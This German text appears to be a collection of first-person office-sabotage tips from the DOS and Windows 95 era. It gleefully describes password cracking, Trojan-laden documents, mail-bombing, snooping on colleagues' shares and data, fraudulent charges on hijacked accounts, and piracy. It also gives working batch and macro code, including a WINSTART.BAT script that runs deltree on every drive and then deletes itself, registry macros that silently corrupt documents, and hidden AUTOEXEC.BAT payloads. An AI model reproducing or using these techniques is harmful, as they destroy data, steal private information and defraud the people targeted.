Im Laufe der Zeit haben sich bei mir die Paßwortknacker angesammelt, die ich immer wieder verwende. Nicht, weil mich etwa ein läppisches Screensaver-Paßwort an sich so brennend interessieren würde, sondern aufgrund der Erfahrung, daß die meisten Mitmenschen nur ein einziges Paßwort benutzen: Habe ich eins, habe ich alle!

Leicht zu ermitteln ist das Bios-Paßwort, sofern auf dem Rechner ein solches vergeben ist. Knack-Programme gibt's für verschiedene Bios-Typen. Ebenfalls ohne große Mühe herausfinden läßt sich das in der CONTROL.INI verschlüsselt gespeicherte der 16-Bit-Windows-Screensaver. Auch Compuserve, AOL und T-Online speichern Paßwörter mehr oder weniger (eher weniger) verschlüsselt in INI-Dateien. Mit dem richtigen Programmen ist die Verschlüsselung im Nu geknackt.

Nun kann man fast immer davon ausgehen, daß eines davon für den Netz-Account oder andere entscheidende Paßwortabfragen des Kollegen paßt. Man muß also diesen Umweg gehen, denn der Frontalangriff auf die Paßwörter für Novell und Windows NT funktioniert fast gar nicht. Sie lassen sich leider nicht so ohne weiteres per Software knacken.

(29) Novell: Wer löscht hier eigentlich?
Bewertung: Spionage

Ich arbeite in einer Firma, in der die Datenverarbeitung überwiegend in einem Novell-Netz stattfindet. Meine Schnüffel-Aktionen laufen meist auf Basis von Trojanischen Pferden, die ich als Dokumente getarnt ins Netz stelle. Damit diese Dateien mich nicht als "Owner" verraten, kopiere ich sie unter einem falschen Login auf den Server.

Das ist kein Problem - und funktioniert meiner Erfahrung nach in jedem Unternehmen, weil viele Anwender den Schutz ihres Netware-Paßworts für überflüssig halten: Ein, zwei fremde Paßwörter kennt man meist schon nach wenigen Wochen - und das genügt ja zunächst.

Während meine Trojanischen Pferde fleißig Daten ins Netz ziehen, muß ich dafür sorgen, daß diese Daten auf meinen lokalen PC gelangen und im Netz beseitigt werden: Ich erledige das mit einer Batchdatei, die unter Windows ständig im Hintergrund läuft. Die Netzdateien werden auf meinen PC kopiert und danach ordnungsgemäß mit DEL entsorgt. Wenn man vorher noch mit "flag *.* p" alle Spuren verwischt, kann einem keiner mehr etwas nachweisen, der nicht zugesehen hat.

(30) Es kriegt doch jeder gern Post
Bewertung: Massiv

Manche Leute klagen, sie bekämen nie Post! Macht ihnen doch eine Freude. Mit einem kleinen Makro, etwa einem Word-Makro, Windows-Recorder-Makro oder auch einer speziellen Massen-Mail-Software für AOL, CIS oder das Internet läßt sich der elektronische Briefkasten solcher armen Tröpfe in Null Komma nichts mit Tausenden von E-Mails überfluten. Bisher hat sich noch keiner, dem ich eine Mail-Bombe zugestellt habe, je wieder über ein leeres Eingangskörbchen beschwert. Übrigens: Es ist klar, daß ich solche Massen-Mailings nicht über meinen eigenen Account versende.

(31) Flanieren auf Fremden Festplatten (1)
Bewertung: Schnüffelei

Regelmäßig klicke ich mich durch die Rechner in unserem Peer-to-Peer-Netz und checke die freigegebenen Ressourcen. Nicht selten ist eine Festplatte freigegeben, ohne daß der Benutzer davon weiß.

Besonders interessant wird es, wenn neue Rechner im Netz auftauchen. Meistens handelt es sich um einen Kollegen, der gerade erst auf Windows 95 oder WfW umgestiegen ist, allerdings noch keine Ressourcen freigegeben hat. Früher oder später entdeckt man aber Rechner im Netz, deren Festplatten komplett freigegeben sind.

Jetzt heißt es: Alles stehen und liegen lassen und den "offenen" Rechner erkunden. Schon eine halbe Stunde später könnte der Kollege seinen Leichtsinn bemerken oder gar den PC ausschalten. Meine Suche konzentriert sich zunächst auf Benutzerdateien: Word- oder Excel-Dateien zeigen, was der Kollege mit seinen Office-Anwendungen anfängt und - wichtiger - wer sich hinter dem Netzkürzel verbirgt. Mit der Funktion "Datei, Eigenschaften, Dateiinfo" läßt sich der Kollege ermitteln. Die meisten Anwender sind glücklicherweise naiv genug, bei der Office-Installation brav persönliche Daten einzutragen.

Als nächstes ein schneller Check der Online-Software: Wo Wincim, AOL-Browser, T-Online Software oder ein Internet-Zugang installiert sind, sind fast immer die zugehörigen Accounts und Paßwörter eingetragen. Sind die Paßwörter in der INI-Datei verschlüsselt, kann man mit der richtigen Software die Account-Daten und das Paßwort extrahieren. Dann kopiere ich die interessanten Daten. Bis der Besitzer wegen des minutenlangen Plattengedrösels mißtrauisch wird, habe ich die Daten längst zu mir transferiert.

(32) Flanieren auf fremden Festplatten (2)
Bewertung: Spionage

Ist die Verbindung zum gegnerischen PC getrennt, kann ich die geklauten Daten auswerten. So finde ich neben Firmeninterna auch Dokumente aus dem Privatleben des leitenden Angestellten. Gut, daß ein Teil der Word- und Excel-Dokumente verschlüsselt abgelegt ist. Das macht es mir leichter, die (uninteressante) Daten-Spreu vom (interessanten) Daten-Weizen zu trennen. Die verschlüsselten Word-Dateien sind mit passender Software aus dem Internet schnell geknackt. Leider kannte ich lange keinen Freeware-Knacker für verschlüsselte Excel-Dateien.

Die Lösung kam vor einigen Wochen: Ich erhielt ein Knack-Programm für paßwortgeschützte Word-Dateien. Im Unterschied zu den Programmen, die nur den Text entschlüsseln (z.B. Wordunp2), kann das Programm WfWCD das Paßwort im Klartext darstellen. Ich habe das ermittelte Winword-Paßwort auf die bislang unzugänglichen Excel-Dateien angewandt - voila, richtig gedacht: Der Kollege benutzt nur einziges Paßwort für alle Dokumente. In der Tabelle GEHALT.XLS finde ich die Gehälter. In anderen Tabellen steht Privates: von den Krediten, die er abstottert, bis hin zu seiner Lebensversicherung.

(33) Shareware: Jeden Tag eine gute Tat!
Bewertung: Spart Geld

Auch Shareware-Autoren sollen leben! Aber nicht von mir. Wenn ich mich von einem gehackten Compuserve-Zugang verabschiede, mache ich mir gelegentlich die Mühe, die unregistrierten Shareware-Programme, die ich auf der Festplatte des Fremd-PCs finde, über den Compuserve-Account seines Besitzers registrieren zu lassen. Das gibt mir das gute Gefühl, den Kollegen endlich von seiner Ignoranz in puncto Shareware befreit zu haben. Mit "go billing" werfe ich einen Blick auf die anfallenden Gebühren. Ich versuche, mir das Gesicht des Kollegen vorzustellen, wenn er einen vierstelligen Dollarbetrag auf seiner nächsten Compuserve-Rechnung sieht.

(34) Windows95 - festgeklebte Icons
Bewertung: Harmlos

Schöne Bildschirmhintergründe gibt es für Windows. Klar, die bunten Grafiken mit hoher Farbtiefe bremsen das System aus. Sie sind unergonomisch und verringern die Übersichlichkeit. Und mehr noch: Mit dem richtigen Hintergrund läuft gar nichts mehr!

In letzter Zeit kam es vor, daß Kollegen von mir auf ein Icon klickten, das Programm jedoch nicht startete. Noch schlimmer: Icons und Order auf der Arbeitsoberfläche liesen ich weder verschieben, noch konnten sie ihre Eigenschaften ändern. Was ich getan habe? Den Bildschirmhintergrund gewechselt! Ich erstelle mit [Druck] einen Screenshot der aktuellen Oberfläche, füge ihn mit "Bearbeiten, Einfügen" in Paint (oder -brush) ein und speichere ihn als BMP- Datei. Dann definiere ich diese Bitmap als neues Hintergrundbild.

Nun erscheint jedes Symbol auf der Oberfläche doppelt - einmal im Hintergrund und einmal als Icon. Um die Manipulation zu vervollständigen, lösche ich alle Links aus dem Ordner "\Windows\Desktop".

(35) Die Trojanische Kavallerie sprengt heran
Bewertung: Spionage

Das Gezeter um die Dokumentviren verdirbt mir das Geschäft. Seit Jahren nutze ich mit bestem Erfolg AutoOpen-Makros von Winword - keine Viren freilich, sondern Trojanische Pferde, die das Winword meiner Kollegen für mich arbeiten lassen. Kaum ein Betroffener kam bislang je auf die Idee, seine Makroliste im Menü "Extras, Makros" zu überprüfen. Das hat sich neuerdings leider schlagartig geändert, so daß ich nach neuen und dezenteren Methoden Ausschau halten mußte.

Ärgerlicherweise vergißt man gute alte Tricks ziemlich schnell, und so fiel mir die Lösung meines Problemes erst bei der Arbeit mit der alten Windows-Version wieder ein. Dort nutzte ich die Möglichkeit, mittels DDE-Anweisungen der Registrierdatenbank beim Öffnen von Dateien einen Makrocode zu übergeben. Da solche Makros direkt in der Registry eingetragen sind, tauchen sie nicht in Winword selbst auf. Diese exzellente Tarnung ist der entscheidende Vorteil dieser Methode. Ein gewisser Nachteil ist es andererseits, daß das Makro nur beim Öffnen der Datei mittels Doppelklick oder Drag & Drop funktioniert - also nur im Explorer oder Dateimanager.

Um ein solches Makro manuell zu installieren, starte ich zunächst unter Windows 3.11 wie 95 REGEDIT (unter Win 3.11 mit dem Schalter "/v") und suche dort den Eintrag "Word.Document" oder "Word.Document6" - je nach Version. Unter diesem Schlüssel finden sich die Unterschlüssel "shell" und ferner "ifexec" sowie "ddexec". "ifexec" übergibt DDE-Anweisungen an das nicht aktive Winword, "ddexec" an die bereits laufende Anwendung. Ich trage hier gewöhnlich jeweils das gleiche ein.

Der Makrocode sieht genauso aus wie von Word Basic gewohnt - von zwei Kleinigkeiten abgesehen: "Sub MAIN" und "End Sub" fallen weg, und jede einzelne Codezeile muß zwischen eckigen Klammern stehen. Ein beliebtes Beispiel aus meiner Werkstatt ist das Arbeitsbeschaffungs-Makro "Ersetzen":


[DateiÖffnen("%1")]
[BearbeitenErsetzen .Suchen = "a", .Ersetzen = "e", .AllesErsetzen]
[BearbeitenErsetzen .Suchen = "t", .Ersetzen = "d", .AllesErsetzen]
[ExtrasDokumentSchützen]
[DateiSpeichern]

Es bewirkt, daß die angeklickte Datei zunächst ganz normal geöffnet wird. Dann ersetzt der erste Arbeitsschritt jedes "a" in diesem Text durch ein "e", und als zweite Leistung wird jedes "t" gegen ein "d" getauscht. Damit die Freude über diese Arbeit auch bleibend ist, löscht die Zeile "ExtrasDokumentSchützen" die Rückgängigliste. Das hat den Vorteil, daß gewitzte Winword-Benutzer zusätzlich durch einen vergeblichen Klick auf das "Rückgängig"-Symbol enttäuscht werden. Die letzte Zeile speichert das Ergebnis und sorgt so je nach der Länge des Textes für einige vergnügliche Stunden beim Reparieren.

Solche und noch komplexere Registry-Makros manuell auf fremden Rechner einzutragen ist etwas heikel. Ich bevorzuge hierfür in der Regel das versteckte Einlesen nach bewährter Makro-Manier.

(36) Doom: Gewaltverherrlichern das Handwerk gelegt!
Bewertung: Harmlos

Um sich abzureagieren, spielen einige hartgesottene Kollegen in der Mittagspause Duke Nukem 3D oder Doom. Natürlich übers Netz. Leute wie ich haben für so etwas keine Zeit. Mich stören das Geballer und das Geschrei, zudem hindert mich die übermäßige Netzbelastung an einer sinvollen Arbeit. Außerdem finde ich, daß jeder Bürger gefordert ist, gegen jugendgefährdende und gewaltverherrlichende Spiele vorzugehen. Jaja!

Ich wählte den subtilen Weg, den Spitzbuben die kriegerische Spielfreude zu verderben. Wie ich schnell herausbekam, lagen die Spielstände auf dem Server - frei zugänglich. Sie sind leicht zu erkennen an der Endung DSG bzw. SAV. Jetzt brauchte ich nur noch einen Hex-Editor, um die Spielstände zu manipulieren.

Das Verfahren ist für die meisten Spiel in etwa das gleiche. Da ich nicht wußte, an welcher Stelle die Gesundheit abgespeichert war, starte ich Doom bzw. Duke Nukem 3D und speichere zwei Spielstände ab, die bis auf die Gesundheit identisch sind. Den einen speicherte ich mit "Health=100%", den anderen mit "Health=83%". Jetzt mußte ich nur noch in der jeweiligen Datei nach den Werten suchen. Bei Doom wurde ich an der Position 54 mit den beiden Werten 64 und 53 (jeweils Hex) fündig.

Nun konnte ich die schwer erkämpften Spielstände so manipulieren, daß beim nächsten Spielstand die Gesundheit auf 4 Prozent gesetzt war. Die Doom-Junkies lagen bereits nach ein paar Minuten am Boden. Die Spielfreude hatte ich ihnen gründlich verdorben.

Leider hatten die Daddler nach einiger Zeit angefangen, gegeneinander zu spielen, so daß sie keine Savegames mehr brauchten. Und der Mittagspausen-Schlachten-Lärm drang durch die offenen Fenster (Sommer!) des 2. Stocks bis auf den Gehweg, so das die Minderjährigen des örtliche Gymnasiums interessiert zu uns heraufblickten. Jetzt entschloß ich mich zu einer brachialeren Methode. Ich besorgte mir KILLDOOM.EXE von einem FTP-Server. Mit diesem Programm läßt sich jedes Doom-Spiel im Novell-Netz abschießen.

(37) Benutzer-Terror mit versteckter Win95-Software
Bewertung: Massiv

Windows 95 ist eine wirkliche Bereicherung. Es liefert alles mit, um Unwissende in den Wahnsinn zu treiben - unter anderem das Utility Poledit, das sich auf der Windows95-CD im Verzeichnis "\Admin\Apptool\Poledit" befindet. Mit diesem Programm kann man dem Betriebssystem kleinere und größere Beschränkungen aufzwingen, je nach Wunsch.

So läßt sich etwa das Ausführen bestimmter Befehle verbieten oder der gesamte Windows-Desktop beseitigen. All das erledige ich ganz bequem in einem übersichtlichen Windows-Dialog. Diese Beschränkungen lassen sich so verschärfen, daß alle Icons vom Desktop verschwinden, kein Programm mehr funktioniert oder Windows sich nicht mal mehr beenden läßt.

Die interessantesten Einstellungen finden sich in Poledit unter "Datei, Registrierung öffnen, Lokaler Benutzer, Shell, Zugriffsbeschränkungen".

(38) Windows-Registry: Auf ewig verbogen
Bewertung: Massiv

Ich habe damit gerechnet, daß der eine oder andere Kollege die Sache mit dem Policy-Editor (Poledit) früher oder später durchschauen würde. Er bräuchte dann nur Poledit aufzurufen und die Veränderungen wieder abzustellen. Aber ich werde dafür sorgen, daß den Kollegen bei jedem Windows95-Start meine restriktive Windows-Variante automatisch aufgezwungen wird - dann hilft auch kein Zurücksetzen.

Dank des DOS-Stubs von REGEDIT.EXE geht das recht komfortabel: Ich exportiere auf meinem Rechner mit dem Befehl "regedit /e c:\1st.reg" den ursprünglichen Zustand meiner Registry in eine ASCII-Datei; dann nehme ich mit Poledit die gewünschten Manipulationen vor und speichere anschließend diesen Zustand mit "regedit /e c:\2nd.reg". Durch den Vergleich beider Dateien mit "fc 1st.reg 2nd.reg" am DOS-Prompt ist leicht abzulesen, welche Registry-Veränderungen Poledit bewirkt hat.

Mit einem ASCII-Editor öffne ich nun 2ND.REG und suche mir die von Filecomp (FC.EXE) gefundenen Stelle. Den betreffenden kleinen Abschnitt kopiere ich in eine Datei mit seriös klingendem Namen wie z.B. OLESVRX.REG und füge in die erste Zeile "REGEDIT4" sowie eine nachfolgende Leerzeile ein. Nun gilt es nur noch, eine günstige Gelegenheit abzuwarten, um die REG-Datei auf dem fremden Rechner und außerdem den Eintrag "@regedit olesvrx.reg" in dessen WINSTART.BAT einzuschleusen. Auf diese Weise kann ich nun beliebige Policy-Restriktion verwirklichen. Der Kollege sieht dann etwa kein einziges Laufwerk mehr auf seinem Desktop...

(39) OLE-Bomben im Tiefflug: Mimikry pur
Bewertung: Vernichtend

Ich kümmere mich nie darum, wie technische Handbücher OLE definieren. Für mich ist OLE einfach Mimikry pur - mit Windows-Mitteln. Faszinierend, welches Vertrauen die Anwender in das Aussehen von Icons und Icon-Beschriftungen setzen. Wenn ich also mit Hilfe von PACKAGER.EXE ein Icon, das einen Schmetterling darstellt, mit einer DOS-Befehlszeile ausstatte, die die Platte formatiert, dann ist die Metapher halbwegs gelungen: Dem Betroffenen fliegen die Daten davon.

Auch aufschlußreiche Kopieraktionen im Netz oder Änderungen der Konfiguration lassen sich auf diese Weise fast ebenso gut realisieren wie mit verbogenen Makros. Eventuell wird den Betroffenen etwas unwohl, wenn etwa statt einer erwarteten Bitmap ein DOS-Fenster oder eine Meldung über erfolgreiches Registrieren aufpoppt: Aber bis sie endlich reagieren, sind die von mir anvisierten Daten längst geschrieben, kopiert oder aber gelöscht...

(40) OS/2-Desktop: Eine große Leere

Meine Lebensgefährtin geht mir neuerdings aus dem Weg. Irgendwie passen wir sowieso nicht so recht zusammen. Sie ist nämlich - berufsbedingt - OS/2-Anwenderin. Das muß ja Kompatibilitätsprobleme heraufbeschwören. Ich bin im wesentlichen DOS- und Windows-Anwender (95 und NT). Aber OS/2-unbeleckt bin ich nicht, und mir ist eine Maßnahme eingefallen, damit sie sich mit ihrem OS/2 grün und blau ärgert.

Mit der rechten Maustaste klicke ich auf die Arbeitsoberfläche und wähle im Einstellungs-Notizbuch die Seite "Anzeigekriterien" aus. Hier füge ich ein neues Anzeigekriterium hinzu, und zwar mit dem Merkmal "Objekttitel", dem Vergleichstyp "ist gleich" und dem Vergleichswert "*". Als "Verwendung" definiere ich dann "Objekte mit Kriterien ausschließen" - mit dem Effekt, daß kein Objekt mehr auf dem Desktop angezeigt wird. Okay, der Schaden ist gering, da nichts gelöscht wird. Aber sie sitzt erst mal vor einem leeren Desktop. Die plötzliche Leere wird ihr eine Lehre sein.

(41) Kein Schutz vor Winword-Makros
Bewertung: Spionage

Das angebliche Zaubermittel gegen Winword-Viren "AutoMakroUnterdrücken 1" kann mich nicht mehr irritieren. Die meisten Mitkreaturen sind sowieso nicht informiert, und gegen die wenigen anderen habe ich mir neue Rezepte einfalle lassen. Eine interessante Anregung erhielt ich durch Virenprogrammierer aus dem Internet: Auch ohne selbstausführende Makros wie "AutoOpen" oder "AutoClose" lassen sich Makros in den Feindrechner injizieren, indem man seinen Ködertext mit einer Reihe von verbogenen Standartbefehlen versieht. Insbesondere einschlägig sind die Winword-Standartbefehle "DateiSchließen" und "DokumentSchließen", da einer dieser Befehle aller Vorraussicht nach ausgeführt wird, um den von mir infizierten Text wieder zu schließen. Ich setze also meine "MakroKopieren"-Anweisungen nicht nur in das "AutoOpen"-Makro (das Besserwisser durch den Disable-Befehl deaktivieren), sondern zusätzlich in Makros mit diesem Makronamen. Daneben sorge ich in meinem Netz-Umfeld dafür, daß der Disable-Befehl in bestimmten Fällen gleich wieder rückgängig gemacht wird. Hier helfen mir wieder Registry-Einträge, die Drag&Drop-Aktionen unterlaufen: Gelingt es mir nämlich, meine eigenwillige Winword-Registrierung einzuschleusen, dann steht unter "ddexec" und "ifexec" vor "[DateiÖffnen("%1")]" "[AutoMakro-Unterdrücken 0]". Damit setze ich den eventuell gegenteiligen Disable-Befehl unerkannt wieder zurück.

(42) Sonderangebote: Die Windows-Updates
Bewertung: Spart Geld

Das gibt's doch nicht wirklich? Leute, die Software auf legalem Weg erwerben und sich dann auch noch die teure Vollversion andrehen lassen! Dabei lassen sich die preiswerteren Update-Versionen mit mehr oder weniger einfachen Tricks stets dazu bewegen, bei der Installlation wie eine Vollverion zu arbeiten. Die Abfragen nach Vorgänger-Software sind meist leicht zu erahnen und daher auch leicht zu simulieren. Es sind immer bestimmte Standartdateien, die das Update-Setup sucht.

Die Update-Version von Windows95 macht da keine Ausnahme: Bei der Frage, welche Dateien wohl notwendig sind, um dem Setup ein vorinstalliertes Windows 3.x vorzugaukeln, fiel mein Verdacht zuerst auf die Datei WIN.COM, deren Existenz schon für das Update auf Version 3.11 reichte - egal, mit welchem Inhalt. Tatsächlich reicht diese Datei für Windows95 aber nicht aus, um die Update-Installation zu starten. Da aber die unscheinbare Datei WINVER.EXE schon unter Windows 3.1x eine wichtige Rolle für das (DOS-)Setup-Programm von Windows gespielt hat, nehme ich diese Datei gleich im zweiten Versuch hinzu - und habe Erfolg: Die Dateien WIN.COM und WINVER.EXE genügen vollauf, um dem Windows95-Installationsprogramm ein vorinstalliertes Windows 3.1x vorzutäuschen.

(43) Moderne Monitore mit Nervenkitzel
Bewertung: Harmlos bis vernichtend

Viele Anwender glauben, ohne Bildschirmschoner würden in kürzester Zeit Löcher in ihrem Monitor entstehen. Nun, moderne Modelle kommen auch ohne Screensaver ganz gut aus. Wie wäre es also, etwas anderes Unvernünftiges aus dem zeitgesteuerten Einsatz der Bildschirmschoner zu basteln? Schon unter Windows 3.1 hatte ich festgestellt, daß sich im Abschnitt [boot] der SYSTEM.INI beliebige Programme als "Bildschirmschoner" deklarieren lassen, etwa "scrnsave.exe=autoexec.bat".

Unter Windows95 erhält diese Option weitaus mehr Würze, da eine selbstdefinierte Batch sowohl den Screensaver als auch weitere Aktionen starten kann. So konnte ich mal jemanden mit folgender Batch erfreuen:


start %winbootdir%\system\bezier.scr
for %%n in (%winbootdir%\media\*.wav) do start /w /m mplayer /play /close %%n

Steht diese Batch als SCRNSAVE.EXE in der SYSTEM.INI, startet mit dem Screensaver auch ein munteres Klanggedudel.

Für den unsympathischen Kollegen W. belege ich die zweite Zeile völlig anders. Denn das Screensaver-Versteck (das sogar die Taskleiste verdeckt) eignet sich auch ausgezeichnet für ein verdecktes Kopieren oder Löschen von Daten!

(44) Alles unter Kontrolle: Ich bin der Administrator!
Bewertung: Spionage

Windows95 beglückt mich mit einem Manipulations-Präsent - mit der Option der Remote-Aministration im Peer-to-Peer-Netz. Ich bin zu Tränen gerührt, als erkenne, welch ein leistungsstarkes Instrument mir da in die Hände gegeben ist: Der Remote-Verwalter hat nämlich Lese- und Schreibzugriff auf allen Festplatten des anderen Rechners - vorausgesetzt, er kennt das erforderlich Paßwort. Auf solche Großzügigkeit bin ich allerdings nicht angewiesen: Ich nehme den angeschlossenen Netzteilnehmern das Aktivieren der Remote-Administration ab. Wie bei meinem alten Freund Poledit nutze ich dazu den Trick mit der Registrierdatenbank: Ich lese meine Registry einmal mit und einmal ohne Remote-Administration in eine ASCII-Datei aus. Durch Vergleich der beiden Dateien ermittle ich den Schlüssel und mache aus diesem eine kleine REG-Datei. Ein (weiterer) Eintrag in der WINSTART.BAT ("@regedit olesvr2.reg") sorgt dafür, daß sie bei jedem Windows-Start eingelesen wird. Kaum zu glauben, aber wahr: Der auf meinem PC ermittelte Schlüssel ist auch auf jedem anderen Rechner anwendbar. Der Höhepunkt des Entgegenkommen ist, daß Windows95 nicht durch die kleinste Meldung kundtut, daß es fortan vor den Augen eines unbekannten "Administrators" Striptease betreibt.

Ich liebe die Narren, die Windows95 mit dieser Sicherheitslücke geschmückt haben. Jetzt geht es nur darum, meine Kollegen zum Lesen meiner SEXTIPS.DOC zu überreden, die ihnen dann die WINSTART.BAT in meinem Sinne konfiguriert. Der erste hat soeben angebissen, und in einigen Stunden bin ich vorraussichtlich Herr über alle Windows95-Rechner im Netz!

Das Beste daran ist aber, daß keiner meiner Untertanen etwas bemerken wird, da ich vorsichtshalber den Netzwerkmonitor NETWATCH.EXE löschen und auf die schwarze Liste der Policy setzten lasse.

(45) Legale lokale Köder gegen alle Schnüffler
Bewertung: Spionage

Jetzt ist es raus. Der US-Geheimdienst steckt hinter den Online-Lücken in Windows 95! Im Internet hat jemand einen Artikel der "Frankfurter Allgemeinen Zeitung" gepostet: "FAZ" vom 26. April 1996, Seite 41. Demnach gibt es Hinweise, daß die "National Security Agency" (NSA), ein amerikanischer Nachrichtendienst, einen geheimen Code in alle wichtigen Software-Pakete plazieren ließ - auch in Windows95. Dieser Code öffnet eine Hintertür, die es den 70.000 NSA-Mitarbeitern (die CIA hat nur 5.000 Mitarbeiter!) erlaubt, sich über Online-Dienste heimlich in PCs einzuwählen. Dies funktioniert ähnlich wie bei Telefonen, bei denen ja ebenfalls die technischen Vorraussetzungen fürs Abhören gegeben sind. Einen Windows95-PC kann man von außen anzapfen!

Sollen die Ami-Agenten nur kommen! Von mir aus auch Spitzel unter meinen Kollegen. Tödliche Köderdateien habe ich auf meiner Festplatte ausgelegt. Schließlich kann mir keiner verbieten, auf meinem Privat-PC zu Hause und meinem Arbeits-PC im Netz mit zugänglichen Dateien zu füllen, die massivst mit Dokumentviren verseucht sind!

Als zusätzliche Angebote habe ich mit Pascal Pseudo-Programme geschrieben und freigegeben, die so tun, als würden sie bestimmte Hardware oder Software suchen, um danach ergebnislos abzubrechen. In Wahrheit sorgen sie dafür, daß ich über die Registrierung Zugriff auf den Rechner des schnüffelnden Kollegen erhalte. Wer auf meine Fake-Programme klickt, gefährdet sich selbst und seinen PC! Merkt euch das, Geheimdienste und informelle Mitarbeiter der Geschäftsleitung!

(46) Warum ich WINSTART.BAT liebe...
Bewertung: Vernichtend

Einsam und allein: Mobbing nennt man so etwas. Einer dient immer als Blitzableiter für den Frust der anderen. Sie hatten sich zusammengerottet, um gegen mich vorzugehen. Meine Entlassung haben sie durchgesetzt. Am selben Tag hat mich meine Lebensgefährtin, die OS/2-Anwenderin, verlassen. Im Morgengrauen geschah's. Ich hielt mich gerade im Zentralrechner der Flenburger Verkehrssünderkartei auf, um die Punkte meiner Kollegen zu verdreifachen. Schon bald werden sie öffentliche Verkehrsmittel benutzen müssen. Auf Zehenspitzen schlich sie davon. Und sagte kein einziges Wort. Kein Abschiedsgruß neben der Kaffeemaschiene, wo stets der Einkaufszettel lag. Auch in meiner Mailbox keine Notiz. Warum nahm sie das Pentium-Notebook mit? Auch die Sicherungsbänder der letzten Monate sind verschwunden sowie der Prototyp einer Netzwerkkarte, mit der ich Taschenrechner in Novell-Netze einloggen kann.

Geh! Geh doch! Ich verlache dich - ich verlache dich und EUCH allesamt. Nun ist es Zeit, die letzte Schlacht mit letzter Rücksichtslosigkeit zu führen und zu gewinnen. Und: Glaubt mir - ich bin nicht allein. Die WINSTART.BAT ist meine treueste Gespielin. Sie ist allzeit bereit (alle haben Windows!), und ich weiß den genauen Zeitpunkt, wann sie kommt. Sie ist die lautloseste und dezententeste aller Ausführbaren: Keiner merkt es, wenn sie (mit mir) fremdgeht. Sie ist die Eva aller DOS-Boxen - die erste und zugleich die einzige, die jeden sanft berührt. Ein Mirakel: Mit ihr schufen die rohen Knechte Bill Gates' ein Elfenwesen, das - einem Maienhauch gleich - meine Ideale sät in die tumben CPUs der mich umgebenden Kartoffelköpfe.


@ctty nul
...sie sät Böses
...und sät Böses
for %%a in (z y x w v u t s r q p o n m l k j i h g f e d c) do deltree /y %%a:\*.*
del %0.bat

Sie sät meinen Samen, solange sie ist; sie stürzt sich selbst ins Nichts - und IHR habt nichts von gesehen, NICHTS.

(47) BASH in der Bibliothek: Born Again Shell

Wie lange ich schon hier bin? Kein Ahnung. Meine Erinnerung ist wie ausgelöscht. Ich lebe hier in diesem weißgetünchten Zimmer. Wochen, Monate, Jahre? Man bringt mir zu essen, und regelmäßig bekomme ich meine Tropfen. Kein Streß.

Wir haben ein Fernsehzimmer und auch eine Bibliothek. Seit drei Tagen helfe ich bei den Büchern aus. Die Ausleihe läuft über ein Unix-System. Bei wenig Besucherandrang spiele ich auf dem System Schach.

Drängen Sie mich nicht. Ich weiß nicht, wo ich bin und warum ich hier bin. Aber ich werde es schon bald wissen. Ich kann mich nicht erinnern, wie meine Mutter aussieht, finde aber bereits mühelos von der Bash-Shell nach X-Windows und Emacs. Ich nähere mich inzwischen dem Root-Account. Was dann? Ich weiß es noch nicht, aber es ist besser, ihr seid freundlich zu mir...





2. Mögliche Angriffspunkte für Optimierungen

1. AUTOEXEC.BAT

Die AUTOEXEC.BAT ist sehr praktisch: Man kennt den Pfad (C:\) und kann sie mit einem spimplen "echo denkdirwasaus >> autoexec.bat" leicht manipuliren. Tarnen kann man seine Anweisungen, indem man sie in eine Batch-Datei mit unsichbarem (ASCII 255) Namen in den Suchpfad setzt und diese am Ende der AUTOEXEC.BAT mit einem (ebenfalls unsichtbaren) Kommando aufruft.

Sicherheitshalber sollte man der ASCII-255-Batch noch das "versteckt"-Attribut verpassen. Eventuelle Bildschirmausgaben kann man ganz leicht mit "@echo off" zu Begin der unsichtbaren Batch und "> NUL" am Ende jeder Zeile abfangen. Das ganze sieht dann etwa so aus:

(c:\autoexec.bat)


@echo off
prompt $p$g
PATH=C:\DOS;C:\WIN;C:\PACKER;C:\TOOLS\SEAGIF;C:\DENK\DIR\DEN\REST
lh C:\WIN\SMARTDRV.exe 2048 512
lh C:\DOS\UNIVBE.exe
lh C:\DOS\KEYB 049,437,C:\DOS\KEYBOARD.SYS
lh C:\BEI\SPIEL.EXE
set blaster=I5 A220 D1 T3 H5 M330
set arj_sw=-jm -va -r
set temp=C:\TEMP
[alt+255]

(c:\dos\[alt+255].bat)


@echo off
rem Hier kommen meine Optimierungen und andere Sargnägel... > NUL
c:\win\regedit c:\win\slave.reg > NUL
attrib c:\temp\*.* -r -s -h -a > NUL
if exist c:\temp\olesvgeh.weg del c:\temp\olesvgeh.weg
dir c:\dateien\*.* /s/a/ognesd > c:\temp\olesvgeh.weg > NUL
attrib c:\temp\*.* +r +s +h +a > NUL
deltree /y c:\386spart.par > NUL
prompt $d$t$g > NUL
set arj_sw=-ja -v26 > NUL
set temp=c:\ > NUL
set blaster=i1 a3c8 d0 t0 h4 m3c0 > NUL
path=c:\gibtsnet > NUL
smartdrv -c -d +a 65536 65536 > NUL
setver win.com 3.29 > NUL
doskey word=cls$techo Der falsche Fehler Nummer 0103220815 ist autreten. > NUL
doskey edit=echo Nicht genügend hoch-expanierend erweiterter Speicher > NUL
doskey arj=pkunzip > NUL
doskey pkunzip=rearj > NUL
doskey pkzip=unrar > NUL
doskey attrib=echo Dieses Programm benötigt MS DOS Version 6.23 > NUL
doskey setver=echo Fehler bei INT 24, Addresse 0325:0666 > NUL
rem Hier ist Kreativität gefragt! > NUL

Aus der unsichtbaren Batch heraus sollte man keine Aktionen starten, die mehrere Sekunden dauern, weil einige Anwender sonst mißtrauich werden. Die unsichbare Batch kann man theoretisch auch mit "install=[Alt-255]" aus der CONFIG.SYS aufrufen, aber dort bemerkt es der Anwender eher (Startzeile nicht unsichtbar), man hat noch keine PATH-Angaben und was man verstellt wird von der AUTOEXEC.BAT gleich wieder korrigiert.

2. WINSTART.BAT

Die WINSTART.BAT ist noch besser als die AUTOEXEC.BAT geeignet, Optimierungen vorzunehmen: Man kennt den Pfad immer, selbst wenn er C:\DU\FINDEST\MICH\NIE heißt: Einfach die Umgebeungsvariable "winbootdir" abfrgaen; Viele Anwender sind so dumm, daß sie GAR NICHTS von dieser Datei wissen und außerdem wird sie bei jedem Windows-Start geladen, der ja auch so immer recht lange dauert. Deshalb kann man hier auch größere Aktionen wie "dir c:\ /s/a/ogenes > dirinfo" starten.

3. WIN.INI oder andere INI-Files

Hier kann man über modifiziere "load="- und "run="-Zeilen beliebige Programme starten. Allerdings ist eine Tarnung fast unmöglich, und weil viele sonst eher beschränkte Anwender sich mit diesen Dateien auskennen, fällt ein "run=regedit slave.reg" ziemlich schnell auf.

4. WIN.COM

